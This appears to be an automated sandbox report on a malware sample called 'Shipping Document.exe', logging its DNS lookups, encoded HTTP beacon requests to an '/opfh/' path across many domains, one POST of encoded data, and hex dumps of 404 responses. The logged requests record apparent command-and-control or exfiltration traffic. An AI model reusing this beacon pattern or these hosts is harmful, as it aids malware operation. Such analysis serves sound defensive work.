Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_010325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_010325E2

Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.batchscraper.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.auronhouse.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ukscan.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=ZzDSVGEFmA6bbFgWUPABJOqYyGy556P6SvdRpmz0pldrPkLsuzUuLHkKP8ebqy61OUsJ3I6Wp1cSjumXpsr68z/GSQBLa7X+Wj1CzMiNU/mDF53obi6xM6x1cOBV2RrPtvioQYdy1WMq&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.swordshoop.caConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.fruitique.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.gamemaster.atConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.annahaywardva.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ziontool.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.busypro.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.performacetoyota.caConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.pricekaboom.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.drapples.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.autonomyai.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.pharmacielorraine.frConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic	HTTP traffic detected: GET /opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Host: www.y94hr.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Source: global traffic	DNS traffic detected: DNS query: www.batchscraper.com
Source: global traffic	DNS traffic detected: DNS query: www.auronhouse.com
Source: global traffic	DNS traffic detected: DNS query: www.ukscan.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.swordshoop.ca
Source: global traffic	DNS traffic detected: DNS query: www.fruitique.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.gamemaster.at
Source: global traffic	DNS traffic detected: DNS query: www.annahaywardva.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.ziontool.xyz
Source: global traffic	DNS traffic detected: DNS query: www.busypro.net
Source: global traffic	DNS traffic detected: DNS query: www.performacetoyota.ca
Source: global traffic	DNS traffic detected: DNS query: www.digishieldu.online
Source: global traffic	DNS traffic detected: DNS query: www.pricekaboom.com
Source: global traffic	DNS traffic detected: DNS query: www.drapples.club
Source: global traffic	DNS traffic detected: DNS query: www.autonomyai.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pharmacielorraine.fr
Source: global traffic	DNS traffic detected: DNS query: www.y94hr.top

Source: unknown

HTTP traffic detected: POST /opfh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.auronhouse.comOrigin: http://www.auronhouse.comReferer: http://www.auronhouse.com/opfh/Cache-Control: max-age=0Content-Length: 218Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 71 58 45 30 64 6d 35 39 2b 4c 45 42 64 72 43 6c 41 5a 4c 5a 39 35 56 52 69 30 55 68 4f 46 42 43 7a 76 6c 35 70 53 56 58 49 51 4a 2b 76 44 55 4d 32 4c 62 7a 61 5a 4d 64 44 66 4b 46 2f 4f 4a 38 6c 33 5a 69 55 49 66 56 31 6f 73 73 54 37 49 61 48 78 4f 4c 51 31 6d 57 6b 78 79 36 67 39 6b 72 75 49 44 39 5a 79 4f 65 52 72 2f 74 72 76 34 43 65 72 65 42 67 78 72 5a 68 74 72 38 49 55 43 2f 4f 35 58 35 6d 4d 51 33 53 67 59 58 6c 43 2b 31 36 6d 37 46 58 75 42 6a 7a 5a 6c 52 35 62 5a 31 70 36 45 56 74 62 45 35 74 78 38 79 6f 73 54 72 65 38 63 35 52 55 2f 6a 67 66 4e 50 43 34 78 33 44 46 66 69 57 41 3d 3d Data Ascii: R40L6=2UG677uIDGFYqXE0dm59+LEBdrClAZLZ95VRi0UhOFBCzvl5pSVXIQJ+vDUM2LbzaZMdDfKF/OJ8l3ZiUIfV1ossT7IaHxOLQ1mWkxy6g9kruID9ZyOeRr/trv4CereBgxrZhtr8IUC/O5X5mMQ3SgYXlC+16m7FXuBjzZlR5bZ1p6EVtbE5tx8yosTre8c5RU/jgfNPC4x3DFfiWA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:49 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 